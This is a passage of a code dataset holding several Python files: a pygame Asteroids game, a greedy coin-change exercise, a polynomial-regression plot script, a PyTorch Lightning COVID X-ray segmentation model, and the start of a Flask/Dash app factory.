destroy(self):\n \"\"\"\n destroys the asteroid and returns the asteroids that should take it's place.\n \"\"\"\n if(not self.destroyed):\n self.destroyed = True\n SmallAster = []\n for i in range(2):\n SmallAster.append(SmallAsteroid(self.x,self.y,self.speed*1.5,random.uniform(0,2*pi),self.gameDisplay)) #makes two more small asteroids in it's place with random directions\n return SmallAster\n return []\nclass SmallAsteroid(Asteroid):\n \"\"\"\n subclass of the asteroid, for the last asteroid\n shrinkage - number that the rectangle hitbox shrinks by\n rect - the hitbox rectangle\n \"\"\"\n def __init__(self,x,y,speed,direction,gameDisplay):\n super().__init__(x,y,speed,direction,gameDisplay)\n self.image = pygame.transform.scale(self.image,(self.w // 8,self.h // 8)) # half as big as medium asteroid\n self.w,self.h = self.image.get_size()\n self.shrinkage = 12\n self.rect = pygame.Rect((self.x + self.shrinkage / 2,self.y + self.shrinkage / 2),(self.w - self.shrinkage,self.h - self.shrinkage))\n self.type = \"Small\"\n def destroy(self):\n \"\"\"\n destroys the asteroid and returns nothing because it is the smallest asteroid\n \"\"\"\n self.destroyed = True\n return []\nclass CollectionOfAsteroids():\n \"\"\"\n A collection of the Asteroids in the game\n listOfAsteroids - a list of the asteroids in the game\n listOfRects - a list of the hitboxes of the asteroids\n gameDisplay - the display\n \"\"\"\n def __init__(self,gameDisplay):\n self.listOfAsteroids = []\n self.gameDisplay = gameDisplay\n self.speed = 1\n def spawnAsteroids(self,numberOfAsteroids):\n \"\"\"\n spawns a set number of asteroids in the sides of the game\n \"\"\"\n width, height = self.gameDisplay.get_size()\n listOfAsteroids = [] # initializes a list of asteroids to update\n listOfRects = [] # initializes a list of hitboxes\n sampleAsteroid = LargeAsteroid(0,0,0,0,self.gameDisplay) # a sample asteroid to know where to spawn the asteroids in case we change the size later\n smallArea = 100 # the area that asteroids are to spawn around the the edge\n for i in range(numberOfAsteroids):\n side = random.randint(1,4)\n if(side == 1): # left side of the screen\n x = random.randint(-sampleAsteroid.w // 2,smallArea - sampleAsteroid.w // 2)\n y = random.randint(-sampleAsteroid.h // 2,height - sampleAsteroid.h // 2)\n elif(side == 2): # top side of the screen\n x = random.randint(-sampleAsteroid.w // 2,width - sampleAsteroid.w // 2)\n y = random.randint(-sampleAsteroid.w // 2,smallArea - sampleAsteroid.w // 2)\n elif(side == 3): # right side of the screen\n x = random.randint(width-smallArea - sampleAsteroid.w // 2,width - sampleAsteroid.w // 2)\n y = random.randint(-sampleAsteroid.w // 2,height - sampleAsteroid.w // 2)\n elif(side == 4): # bottom of the screen\n x = random.randint(-sampleAsteroid.w // 2,width - sampleAsteroid.w // 2)\n y = random.randint(height-smallArea - sampleAsteroid.w // 2,height - sampleAsteroid.w // 2)\n direction = random.uniform(0,pi * 2) # initiate each asteroid with a random direction\n listOfAsteroids.append(LargeAsteroid(x,y,self.speed,direction,self.gameDisplay))\n listOfRects.append(listOfAsteroids[i].rect)\n self.listOfAsteroids = listOfAsteroids\n self.listOfRects = listOfRects\n def update(self):\n \"\"\"\n updates all the asteroids, deleting them from the list if they are destroyed.\n \"\"\"\n listOfRects = [] # asteroid\n ListToDelete = [] # a list that incluedes the indicies of what to delete\n for i in range(len(self.listOfAsteroids)):\n if(self.listOfAsteroids[i].destroyed):\n 
ListToDelete.append(i) # if the asteroid is destroyed, remember the number to remove it later\n else:\n self.listOfAsteroids[i].update()\n listOfRects.append(self.listOfAsteroids[i].rect)\n for j in reversed(ListToDelete): # reversed so that it doesn't delete one and shift mid for loop.\n del self.listOfAsteroids[j]\n self.listOfRects = listOfRects\n def destroyAll(self):\n \"\"\"\n function for testingasteroid, not for the real game\n \"\"\"\n sizeOfAsteroids = range(len(self.listOfAsteroids))\n for i in sizeOfAsteroids:\n newAsteroid = self.listOfAsteroids[i].destroy()\n if(newAsteroid != None):\n self.listOfAsteroids += newAsteroid # destroying all of the asteroids making them medium\n for i in sizeOfAsteroids:\n self.listOfAsteroids.pop(0)\nclass Projectile():\n \"\"\"\n projectiles that fire and destroy asteroids, ufos and players.\n x - position x\n y - position y\n w, h - size of the projectiles\n speed - speed of the projectile\n direction- direction given to the projectiles\n rect - the hitbox of the projectile\n gameDisplay - the display\n destroyed - senses whether the projectile is destroyed or not\n distanceTravelled - detects how far the projectile has travelled\n \"\"\"\n def __init__(self,x,y,direction,alliance,gameDisplay):\n size = 3\n self.x = x\n self.y = y\n self.w = size\n self.h = size\n self.speed = 10\n self.direction = direction\n self.rect = ((self.x,self.y),(size,size))\n self.image = pygame.Surface((size,size))\n self.image.fill((255,255,255))\n self.gameDisplay = gameDisplay\n width,height = self.gameDisplay.get_size()\n self.destroyed = False\n self.distanceTravelled = 0 # asteroids\n if(alliance == \"Ship\"):\n self.distanceWanted = 5/8 * height # the distance that the projectile travels before it is destroyed\n else:\n self.distanceWanted = 3/8 * height\n self.alliance = alliance\n def update(self):\n \"\"\"\n updates the position of the particle\n \"\"\"\n if(self.distanceTravelled < self.distanceWanted): # if the projectile has travelled farther than the wanted distance, it destroys itself\n width, height = self.gameDisplay.get_size() # gets the display's width and length\n self.x = self.x + (self.speed * cos(self.direction)) # Sets the speed to a small change in space\n self.y = self.y + (self.speed * sin(self.direction))\n self.distanceTravelled += self.speed # updates the disnance travelled\n if(self.x >= width): # If the projectile's coordinate goes outside of the window, set that coordinate to the other side of the map\n self.x = 0 - self.w # adding the width of the image to make sure that the image doesn't appear suddenly (the image's position is the top right of the image)\n elif(self.x <= 0 - self.w): # same as above (makes it so that the whole image has to leave the screen for it to go to the other side)\n self.x = width\n if(self.y >= height):\n self.y = 0 - self.h\n elif(self.y <= 0 - self.h):\n self.y = height\n self.rect = pygame.Rect((self.x,self.y),(self.w,self.h))\n self.gameDisplay.blit(self.image,(self.x,self.y)) # draws the pixel on the screen\n #pygame.draw.rect(self.gameDisplay,(0,255,0),self.rect) # display's the projectile's hit box in green (for testing)\n else:\n self.destroy() # satisfying to right\n def destroy(self):\n self.destroyed = True\nclass CollectionOfProjectiles():\n \"\"\"\n A collection of the Projectiles in the game\n listOfProjectiles - a list of the asteroids in the game\n listOfRects - a list of the hitboxes\n gameDisplay - the display\n \"\"\"\n def __init__(self,gameDisplay):\n self.listOfProjectiles = [] 
#initializes the asteroidprojectiles\n self.listOfRects = [] # initializes their hitboxes\n self.gameDisplay = gameDisplay\n def addProjectile(self,x,y,direction,alliance):\n \"\"\"\n Adds a projectile to the game at the given x y and direction with an alliance of either \"UFO\" or \"Ship\"\n \"\"\"\n self.listOfProjectiles.append(Projectile(x,y,direction,alliance,self.gameDisplay)) # The spacebar command should call this\n # with the x,y and directions of the ship (with an offset bc of the front of the ship and that the origin is top left)\n def update(self):\n \"\"\"\n Updates all of the projectiles\n \"\"\"\n ListToDelete = [] # initializes the indices of what to delete\n ListOfRects = []\n for i in range(len(self.listOfProjectiles)):\n if(self.listOfProjectiles[i].destroyed):\n ListToDelete.append(i) # adding the index of destroyed particles to delete\n else:\n self.listOfProjectiles[i].update()\n ListOfRects.append(self.listOfProjectiles[i].rect)\n for j in reversed(ListToDelete):\n del self.listOfProjectiles[j]\n self.listOfRects = ListOfRects\nclass UFO():\n \"\"\"\n A class of the general UFO, that moves autonomously and shoots\n (we didn't have enough time to implement a second UFO, so there is only one type of UFO)\n x - x position\n y - y position\n speed - speed of the ufo, constant\n destroyed - whether the UFO is destroyed or not\n image - the UFO image\n w,h - the height and width of the image\n FacingRight - the direction the UFO is facing(UFO goes either right to left or left to right)(also determines x position)\n counter - for recording the refractory period of the shooting\n listOfProjectiles - to allow it to call the add projectile function\n straight - whether the UFO goes straight across the screen or down then up\n \"\"\"\n def __init__(self,y,FacingRight,gameDisplay,listOfProjectiles):\n self.y = y\n self.speed = 2\n self.destroyed = False\n self.image = pygame.image.load('UFO.gif').convert()\n self.image.set_colorkey((0,0,0))\n self.w, self.h = self.image.get_size()\n self.straight = bool(random.getrandbits(1))\n self.FacingRight = FacingRight\n self.gameDisplay = gameDisplay\n width, height = gameDisplay.get_size()\n self.counter = 0\n self.listOfProjectiles = listOfProjectiles\n if(FacingRight):\n self.x = -self.w\n else:\n self.x = width\n def update(self):\n \"\"\"\n updates the position of the UFO, as well as deciding when to shoot\n \"\"\"\n if(self.counter % self.fireRate == 0):\n self.shoot()\n self.counter += 1\n width, height = self.gameDisplay.get_size()\n if(self.straight == True): # sometimes it goes straight accross, sometimes down then up\n if(self.FacingRight):\n self.direction = 0\n else:\n self.direction = pi\n else:\n if(self.FacingRight): # algorithm for going down then up\n if((self.x + self.w / 2) < width * 1 / 4):\n self.direction = 0\n elif(self.x + self.w / 2 < width / 2):\n self.direction = pi / 4\n else:\n self.direction = - pi / 4\n else:\n if((self.x + self.w / 2) > width * 3 / 4):\n self.direction = pi\n elif(self.x + self.w / 2 > width / 2):\n self.direction = 5 * pi / 4\n else:\n self.direction = 3 * pi / 4\n self.x = self.x + (self.speed * cos(self.direction)) # Sets the speed to a small change in space\n self.y = self.y + (self.speed * sin(self.direction))\n if(self.x >= width and self.FacingRight): # if the UFO goes out of the screen, destroy it\n self.destroyed = True\n elif(self.x <= 0 - self.w and not self.FacingRight):\n self.destroyed = True\n if(self.y >= height): # If the UFOs coordinate goes outside of the window, set 
that coordinate to the other side of the map\n self.y = 0 - self.h # adding the width of the image to make sure that the image doesn't appear suddenly (the image's position is the top right of the image)\n elif(self.y <= 0 - self.h): # same as above (makes it so that the whole image has to leave the screen for it to go to the other side)\n self.y = height\n self.rect = pygame.Rect((self.x + self.shrinkage / 2,self.y + self.shrinkage / 2),(self.w - self.shrinkage,self.h - self.shrinkage))\n #pygame.draw.rect(self.gameDisplay,(0,0,255),self.rect) # display's the UFO's hit box in blue (for testing)\n self.gameDisplay.blit(self.image,(self.x,self.y))\n def destroy(self):\n \"\"\"\n destroys the UFO\n \"\"\"\n self.destroyed = True\nclass BigUFO(UFO):\n \"\"\"\n A subclass of UFO that shoots in a random direction and moves either straight or down then up\n shrinkage - how much to shrink the UFO image\n fireRate - cooldown for how often the UFO fires\n \"\"\"\n def __init__(self,y,FacingRight,gameDisplay,listOfProjectiles):\n super().__init__(y,FacingRight,gameDisplay,listOfProjectiles)\n self.image = pygame.transform.scale(self.image,(self.w // 2,self.h // 2))\n self.w,self.h = self.image.get_size()\n self.shrinkage = 30\n self.rect = pygame.Rect((self.x + self.shrinkage / 2,self.y + self.shrinkage / 2),(self.w - self.shrinkage,self.h - self.shrinkage))\n self.fireRate = 60\n def shoot(self):\n \"\"\"\n shoots a projectile\n \"\"\"\n if(not self.destroyed):\n self.listOfProjectiles.addProjectile(self.x + self.w / 2,self.y + self.h / 2,random.uniform(0,2*pi),\"UFO\")\nclass CollectionOfUFOs():\n \"\"\"\n A collection of the UFOs on the screen(there can only be one UFO, but this allows for an opportunity to add more if the game is too easy)\n listOfUFOs - the list of the UFOs on screen\n listOfRects - the list of the hitboxes of UFOs\n gameDisplay - display\n listOfProjectiles - the list of projectiles on screen so UFOs can shoot\n \"\"\"\n def __init__(self,gameDisplay,listOfProjectiles):\n self.listOfUFOs = [] #initializes the projectiles\n self.listOfRects = [] # initializes their hitboxes\n self.gameDisplay = gameDisplay\n self.listOfProjectiles = listOfProjectiles\n def spawnBigUFO(self):\n \"\"\"\n Spawns a big UFO in the game (would have been complemented by a spawnSmallUFO if time alloted)\n \"\"\"\n width, height = self.gameDisplay.get_size()\n sampleUFO = BigUFO(0,True,self.gameDisplay,self.listOfProjectiles)\n y = random.randint(-sampleUFO.h // 2,height - sampleUFO.h // 2)\n facingRight = bool(random.getrandbits(1))\n self.listOfUFOs.append(BigUFO(y,facingRight,self.gameDisplay,self.listOfProjectiles))\n def update(self):\n \"\"\"\n updates the list of UFOs\n \"\"\"\n listOfRects = []\n ListToDelete = [] # initializes the indices of what to delete\n for i in range(len(self.listOfUFOs)):\n if(self.listOfUFOs[i].destroyed):\n ListToDelete.append(i) # adding the index of destroyed particles to delete\n else:\n self.listOfUFOs[i].update()\n listOfRects.append(self.listOfUFOs[i].rect)\n for j in reversed(ListToDelete):\n del self.listOfUFOs[j]\n self.listOfRects = listOfRects\nclass listOfObjects():\n \"\"\"\n List of all objects in the game:\n gameDisplay - display\n Asteroids - the collection of Asteroids\n Projectiles - the collection of Projectiles\n UFOs - the collection of UFOs\n ship - the ship in the game\n \"\"\"\n def __init__(self,gameDisplay, ship):\n self.gameDisplay = gameDisplay\n self.Asteroids = CollectionOfAsteroids(gameDisplay)\n self.Projectiles = 
CollectionOfProjectiles(gameDisplay) # contains the CollectionOfAsteroids and CollectionOfProjectiles objects\n        self.UFOs = CollectionOfUFOs(gameDisplay,self.Projectiles)\n        self.ship = ship\n    def update(self):\n        \"\"\"\n        updates all objects and handles any collision detection between objects\n        \"\"\"\n        self.Asteroids.update()\n        self.UFOs.update()\n        self.Projectiles.update()\n        collisionsAster = self.ship.rect.collidelist(self.Asteroids.listOfRects) # detects if any of the asteroids are in contact with the ship\n        if (collisionsAster != -1 and self.ship.destroyed == False): # if there is a collision\n            self.Asteroids.listOfAsteroids += self.Asteroids.listOfAsteroids[collisionsAster].destroy() #destroy both the asteroid and the ship.\n            self.ship.destroy()\n        collisionsUFO = self.ship.rect.collidelist(self.UFOs.listOfRects)\n        if (collisionsUFO != -1 and self.ship.destroyed == False): # if there is a collision\n            #self.UFOs.listOfUFOs[collisionsUFO].destroy() #destroy both the asteroid and the projectile.\n            self.ship.destroy()\n        collisionsProj = self.ship.rect.collidelist(self.Projectiles.listOfRects)\n        if (collisionsProj != -1 and self.Projectiles.listOfProjectiles[collisionsProj].alliance != \"Ship\" and self.ship.destroyed == False):\n            self.Projectiles.listOfProjectiles[collisionsProj].destroy()\n            self.ship.destroy()\n        for i in self.Projectiles.listOfProjectiles: # runs through each projectile\n            collisionsAster = i.rect.collidelist(self.Asteroids.listOfRects) # detects if any of the asteroids are in contact with the projectile\n            if (collisionsAster != -1): # if there is a collision\n                if(i.alliance == \"Ship\"):\n                    if(self.Asteroids.listOfAsteroids[collisionsAster].type == \"Large\"):\n                        self.ship.score += 20\n                    elif(self.Asteroids.listOfAsteroids[collisionsAster].type == \"Medium\"):\n                        self.ship.score += 50\n                    elif(self.Asteroids.listOfAsteroids[collisionsAster].type == \"Small\"):\n                        self.ship.score += 100\n                self.Asteroids.listOfAsteroids += self.Asteroids.listOfAsteroids[collisionsAster].destroy() #destroy both the asteroid and the projectile.\n                i.destroy()\n            collisionsUFO = i.rect.collidelist(self.UFOs.listOfRects)\n            if (collisionsUFO != -1 and i.alliance != \"UFO\"): # if there is a collision\n                self.UFOs.listOfUFOs[collisionsUFO].destroy() #destroy both the UFO and the projectile.\n                i.destroy()\n                self.ship.score += 500\n        for i in self.UFOs.listOfUFOs:\n            collisionsAster = i.rect.collidelist(self.Asteroids.listOfRects) # detects if any of the asteroids are in contact with the UFO\n            if (collisionsAster != -1): # if there is a collision\n                self.Asteroids.listOfAsteroids += self.Asteroids.listOfAsteroids[collisionsAster].destroy() #destroy both the asteroid and the UFO.\n                i.destroy()\n","sub_path":"classes.py","file_name":"classes.py","file_ext":"py","file_size_in_byte":29010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
{"seq_id":"642487220","text":"money_type = [500, 100, 50, 10]\nchanges = 1260\ncount = 0\n\n# greedy: use as many coins of each denomination as possible, largest first\nfor coin in money_type:\n    result = changes // coin\n    count += result\n    changes -= coin * result\n\nprint(count)\n\n\n\n'''\n# textbook solution\nn = 1260\ncount = 0\n\n# check denominations in order, from the largest\ncoin_type = [500, 100, 50, 10]\n\nfor coin in coin_type:\n    count += n // coin # count how many coins of this denomination can be given as change\n    n %= coin\n\nprint(count)\n'''\n","sub_path":"Greedy/거스름돈.py","file_name":"거스름돈.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
+{"seq_id":"436365628","text":"\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\ndataset = pd.read_csv('Datasetwithservices-Sheet1.csv')\n\ntemp = dataset.iloc[:, :].values\n\n\nlaptop_count=[]\nyear=[]\nfor i in range(2009,2019):\n year.append(i)\n\n\ntempc=0\nfor j in range(0,len(year)):\n for i in range(0,len(temp)):\n if temp[i][3]=='Laptop' and temp[i][8]=='USA':\n if temp[i][4] == year[j]:\n tempc=tempc+1 \n laptop_count.append(tempc)\n tempc=0 \n \nt1=[]\ny=[]\nfor j in range(0,len(year)):\n t=year[j]\n t1.append(t)\n y.append(t1)\n t1=[]\nX=y\ny=laptop_count\nfrom sklearn.linear_model import LinearRegression\nlin_reg = LinearRegression()\nlin_reg.fit(X,y)\nfrom sklearn.preprocessing import PolynomialFeatures\npoly_reg = PolynomialFeatures(degree = 4)\nX_poly = poly_reg.fit_transform(X)\npoly_reg.fit(X_poly, y)\nlin_reg_2 = LinearRegression()\nlin_reg_2.fit(X_poly, y)\n\n# Visualising the Polynomial Regression results\nplt.scatter(X, y, color = 'red')\nplt.plot(X, lin_reg_2.predict(poly_reg.fit_transform(X)), color = 'blue')\nplt.title('Truth or Bluff (Polynomial Regression)')\nplt.xlabel('Position level')\nplt.ylabel('Salary')\nplt.show()\n\n# Visualising the Polynomial Regression results (for higher resolution and smoother curve)\nX_grid = np.arange(min(year), max(year), 0.1)\nX_grid = X_grid.reshape((len(X_grid), 1))\nplt.scatter(X, y, color = 'red')\nplt.plot(X_grid, lin_reg_2.predict(poly_reg.fit_transform(X_grid)), color = 'blue')\nplt.title('Truth or Bluff (Polynomial Regression)')\nplt.xlabel('Position level')\nplt.ylabel('Salary')\nplt.show()\n\n# Predicting a new result with Polynomial Regression\nlin_reg_2.predict(poly_reg.fit_transform(2019))\n\n","sub_path":"polyregregional.py","file_name":"polyregregional.py","file_ext":"py","file_size_in_byte":1694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"123664631","text":"\nfrom torch.utils.data import DataLoader\nfrom segmentation_models_pytorch.losses import LovaszLoss, DiceLoss, FocalLoss\n\nimport os\nimport torch\nimport torchmetrics\n\nimport pandas as pd\nimport torchvision.transforms as T\nimport torch.nn.functional as F\nimport pytorch_lightning as pl\n\nfrom model.unet_smp_mask_cond import SMPModelMaskCond\nfrom dataset import COVIDDataset, VinBigDataset\nfrom utils.etc import collate_fn, split_df, get_image_size_from_decoder_blocks, get_lr_scheduler\nfrom utils.augmentation import get_study_transform\n\nclass LitUnetSmpMaskCond(pl.LightningModule):\n def __init__(self, config, learning_rate=None):\n super().__init__()\n self.config = config\n if learning_rate:\n self.learning_rate = learning_rate\n else:\n self.learning_rate = config.lr\n self.num_classes = 4\n\n self.model = SMPModelMaskCond(self.config.unet_smp)\n\n self.train_map = torchmetrics.BinnedAveragePrecision(num_classes=4)\n self.val_map = torchmetrics.BinnedAveragePrecision(num_classes=4)\n self.test_map = torchmetrics.BinnedAveragePrecision(num_classes=4)\n\n self.mask_img_size = get_image_size_from_decoder_blocks(config.unet_smp.decoder_blocks, config.img_size)\n\n self.lovasz_loss = LovaszLoss(mode=\"multilabel\")\n self.dice_loss = DiceLoss(mode=\"multilabel\")\n self.focal_loss = FocalLoss(mode=\"multilabel\")\n\n def setup(self, stage):\n if \"vin\" in self.config.data_root:\n train_df = pd.read_csv(os.path.join(self.config.data_root, \"train.csv\"))\n train_df, val_df = split_df(train_df, 8888, 0, cv=\"kf\")\n train_transform, val_transform = 
get_study_transform(self.config.img_size)\n self.train_set = VinBigDataset(root=self.config.data_root, mask=self.config.mask_type, img_size=self.config.img_size, df=train_df, transform=train_transform, mask_img_size=self.mask_img_size)\n self.test_set = VinBigDataset(root=self.config.data_root, mask=self.config.mask_type, img_size=self.config.img_size, df=val_df, transform=val_transform, mask_img_size=self.mask_img_size)\n else:\n if self.config.no_ricord_val:\n assert self.config.dataset_postfix == \"-merge\" or self.config.dataset_postfix == \"-pseudo\" or self.config.dataset_postfix == \"-pseudo2\"\n train_df = pd.read_csv(os.path.join(self.config.data_root, \"train_psl_none.csv\"))\n ricord_df = train_df[train_df[\"merge\"] == True]\n train_df = train_df[train_df[\"merge\"] == False]\n\n if self.config.second_train:\n _, val_df = split_df(train_df, self.config.seed, self.config.fold, self.config.cv)\n else:\n train_df, val_df = split_df(train_df, self.config.seed, self.config.fold, self.config.cv)\n\n train_df = pd.concat((train_df, ricord_df))\n else:\n train_df = pd.read_csv(os.path.join(self.config.data_root, \"train_psl_none.csv\"))\n\n if self.config.second_train:\n _, val_df = split_df(train_df, self.config.seed, self.config.fold, self.config.cv)\n else:\n train_df, val_df = split_df(train_df, self.config.seed, self.config.fold, self.config.cv)\n\n\n if self.config.album:\n train_transform, val_transform = get_study_transform(self.config.img_size)\n self.train_set = COVIDDataset(root=self.config.data_root, mask=self.config.mask_type, img_size=self.config.img_size, df=train_df, transform=train_transform, mask_img_size=self.mask_img_size)\n self.test_set = COVIDDataset(root=self.config.data_root, mask=self.config.mask_type, img_size=self.config.img_size, df=val_df, transform=val_transform, mask_img_size=self.mask_img_size)\n else:\n transform = T.Compose([\n T.Resize(self.config.img_size),\n T.ToTensor(),\n T.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n ])\n self.train_set = COVIDDataset(root=self.config.data_root, mask=self.config.mask_type, img_size=self.config.img_size, df=train_df, transform=transform, mask_img_size=self.mask_img_size)\n self.test_set = COVIDDataset(root=self.config.data_root, mask=self.config.mask_type, img_size=self.config.img_size, df=val_df, transform=transform, mask_img_size=self.mask_img_size)\n\n def training_step(self, batch, _):\n inputs, targets, masks = self.get_batch(batch, mask=self.config.mask_type)\n\n loss = None\n losses_to_use = self.config.losses.split(\",\")\n\n inputs = torch.stack(inputs)\n\n stage = \"train\"\n\n if \"seg\" in losses_to_use:\n masks = torch.stack(masks)\n\n outputs_masks = self.model.forward_mask(inputs)\n loss_seg = self.calc_seg_loss(outputs_masks, masks)\n\n self.log(f\"{stage}_loss_seg\", loss_seg, on_step=False, on_epoch=True, sync_dist=True)\n if loss is None:\n loss = loss_seg\n else:\n loss += loss_seg\n\n if \"cls\" in losses_to_use:\n outputs = self.model(inputs, outputs_masks)\n loss_cls = F.cross_entropy(outputs, targets)\n self.log(f\"{stage}_loss_cls\", loss_cls, on_step=False, on_epoch=True, sync_dist=True)\n if loss is None:\n loss = loss_cls\n else:\n loss += loss_cls\n\n ap = self.train_map(torch.softmax(outputs, dim=1), targets)\n mean_ap = sum(ap) / len(ap)\n\n self.log(f\"{stage}_mAP\", mean_ap, on_step=False, on_epoch=True, sync_dist=True)\n\n loss = loss / len(losses_to_use)\n\n self.log(f\"{stage}_loss\", loss, on_step=False, on_epoch=True, sync_dist=True)\n\n return loss\n\n def 
training_epoch_end(self, outs):\n ap = self.train_map.compute()\n mean_ap = sum(ap) / len(ap)\n self.log(\"train_mAP_epoch\", mean_ap, on_step=False, on_epoch=True, prog_bar=True, logger=True, sync_dist=True)\n\n\n def validation_step(self, batch, batch_idx):\n inputs, targets, masks = self.get_batch(batch, mask=self.config.mask_type)\n\n loss = None\n losses_to_use = self.config.losses.split(\",\")\n\n inputs = torch.stack(inputs)\n\n stage = \"val\"\n\n if \"seg\" in losses_to_use:\n masks = torch.stack(masks)\n\n outputs_masks = self.model.forward_mask(inputs)\n loss_seg = self.calc_seg_loss(outputs_masks, masks)\n\n self.log(f\"{stage}_loss_seg\", loss_seg, on_step=False, on_epoch=True, sync_dist=True)\n if loss is None:\n loss = loss_seg\n else:\n loss += loss_seg\n\n if \"cls\" in losses_to_use:\n outputs = self.model(inputs, outputs_masks)\n loss_cls = F.cross_entropy(outputs, targets)\n self.log(f\"{stage}_loss_cls\", loss_cls, on_step=False, on_epoch=True, sync_dist=True)\n if loss is None:\n loss = loss_cls\n else:\n loss += loss_cls\n\n ap = self.val_map(torch.softmax(outputs, dim=1), targets)\n mean_ap = sum(ap) / len(ap)\n\n self.log(f\"{stage}_mAP\", mean_ap, on_step=False, on_epoch=True, sync_dist=True)\n\n\n loss = loss / len(losses_to_use)\n\n self.log(f\"{stage}_loss\", loss, on_step=False, on_epoch=True, sync_dist=True)\n\n return loss\n\n def validation_epoch_end(self, outs):\n ap = self.val_map.compute()\n mean_ap = sum(ap) / len(ap)\n self.log(\"val_mAP_epoch\", mean_ap, on_step=False, on_epoch=True, prog_bar=True, logger=True, sync_dist=True)\n\n def test_step(self, batch, batch_idx):\n inputs, targets, masks = self.get_batch(batch, mask=self.config.mask_type)\n\n loss = None\n losses_to_use = self.config.losses.split(\",\")\n\n inputs = torch.stack(inputs)\n\n stage = \"test\"\n\n if \"seg\" in losses_to_use:\n masks = torch.stack(masks)\n\n outputs_masks = self.model.forward_mask(inputs)\n loss_seg = self.calc_seg_loss(outputs_masks, masks)\n\n self.log(f\"{stage}_loss_seg\", loss_seg, on_step=False, on_epoch=True, sync_dist=True)\n if loss is None:\n loss = loss_seg\n else:\n loss += loss_seg\n\n if \"cls\" in losses_to_use:\n outputs = self.model(inputs, outputs_masks)\n loss_cls = F.cross_entropy(outputs, targets)\n self.log(f\"{stage}_loss_cls\", loss_cls, on_step=False, on_epoch=True, sync_dist=True)\n if loss is None:\n loss = loss_cls\n else:\n loss += loss_cls\n\n ap = self.test_map(torch.softmax(outputs, dim=1), targets)\n mean_ap = sum(ap) / len(ap)\n\n self.log(f\"{stage}_mAP\", mean_ap, on_step=False, on_epoch=True, sync_dist=True)\n\n\n loss = loss / len(losses_to_use)\n\n self.log(f\"{stage}_loss\", loss, on_step=False, on_epoch=True, sync_dist=True)\n\n return loss\n\n def test_epoch_end(self, outs):\n ap = self.test_map.compute()\n mean_ap = sum(ap) / len(ap)\n self.log(\"test_mAP_epoch\", mean_ap, on_step=False, on_epoch=True, prog_bar=True, logger=True, sync_dist=True)\n\n def configure_optimizers(self):\n model_params = [\n {\"params\": self.model.seg.encoder.parameters(), \"lr\": self.learning_rate * self.config.w_enc},\n {\"params\": list(self.model.seg.decoder.parameters())+list(self.model.seg.segmentation_head.parameters()), \"lr\": self.learning_rate * self.config.w_seg},\n {\"params\": list(self.model.neck.parameters())+list(self.model.head.parameters()), \"lr\": self.learning_rate * self.config.w_cls},\n ]\n if self.config.optimizer == \"sgd\":\n optimizer = torch.optim.SGD(\n model_params,\n lr=self.learning_rate,\n 
momentum=self.config.momentum,\n weight_decay=1e-5,\n # nesterov=True,\n )\n elif self.config.optimizer == \"adam\":\n optimizer = torch.optim.Adam(\n model_params,\n lr=self.learning_rate,\n )\n elif self.config.optimizer == \"adamw\":\n optimizer = torch.optim.AdamW(\n model_params,\n lr=self.learning_rate,\n )\n\n if self.config.lr_schedule.name:\n lr_scheduler = get_lr_scheduler(self.config.lr_schedule, optimizer)\n\n return [optimizer], [lr_scheduler]\n else:\n return optimizer\n\n def train_dataloader(self):\n return DataLoader(self.train_set, batch_size=self.config.batch_size,\n collate_fn=collate_fn, shuffle=True, pin_memory=True, num_workers=self.config.num_workers, drop_last=True)\n\n def val_dataloader(self):\n return DataLoader(self.test_set, batch_size=self.config.batch_size,\n collate_fn=collate_fn, pin_memory=True, num_workers=self.config.num_workers, drop_last=True)\n\n def test_dataloader(self):\n return DataLoader(self.test_set, batch_size=self.config.batch_size,\n collate_fn=collate_fn, pin_memory=True, num_workers=self.config.num_workers, drop_last=True)\n\n def get_batch(self, batch, mode=\"train\", mask=None):\n if mask:\n imgs, _, _, boxes, targets_image, targets_study, masks = batch\n\n if mode == \"train\":\n img = [img.float() for img in imgs]\n masks = [mask.float() for mask in masks]\n targets_study = torch.stack(targets_study)\n return img, targets_study, masks\n else:\n imgs, _, _, boxes, targets_image, targets_study = batch\n\n if mode == \"train\":\n img = [img.float() for img in imgs]\n targets_study = torch.stack(targets_study)\n return img, targets_study, None\n\n def calc_seg_loss(self, outputs_masks, masks):\n masks_sum = masks.sum(dim=-1).sum(dim=-1).sum(dim=-1)\n\n outputs_masks[masks_sum < 10] *= 0\n masks[masks_sum < 10] *= 0\n\n loss_seg = 0.0\n total = 0\n\n if self.config.loss_pooling:\n outputs_masks = F.max_pool2d(outputs_masks, self.config.loss_pooling)\n masks = F.max_pool2d(masks, self.config.loss_pooling)\n\n if self.config.lambda_bce:\n loss_seg += self.config.lambda_bce * F.binary_cross_entropy_with_logits(outputs_masks, masks)\n total += 1\n if self.config.lambda_lovasz:\n loss_seg += self.config.lambda_lovasz * self.lovasz_loss(outputs_masks, masks)\n total += 1\n if self.config.lambda_dice:\n loss_seg += self.config.lambda_dice * self.dice_loss(outputs_masks, masks)\n total += 1\n if self.config.focal_loss:\n loss_seg += self.config.lambda_focal * self.focal_loss(outputs_masks, masks)\n total += 1\n\n assert total != 0\n\n return loss_seg / total\n","sub_path":"train_code_study_2class/pl_script/unet_smp_mask_cond.py","file_name":"unet_smp_mask_cond.py","file_ext":"py","file_size_in_byte":13125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"482830088","text":"from flask import Flask\nfrom dash import Dash\n\nfrom .__version__ import __version__\nfrom .utils import get_dash_args_from_flask_config\nfrom sqlalchemy.orm import scoped_session\nfrom .api.database import SessionLocal, engine\nfrom .api.sqlalchemy_declarative import *\nfrom datetime import datetime\n\n\ndef create_flask(config_object=f\"{__package__}.settings\"):\n \"\"\"Create the Flask instance for this application\"\"\"\n server = Flask(__package__)\n\n # load default settings\n server.config.from_object(config_object)\n\n # load additional settings that will override the defaults in settings.py. 
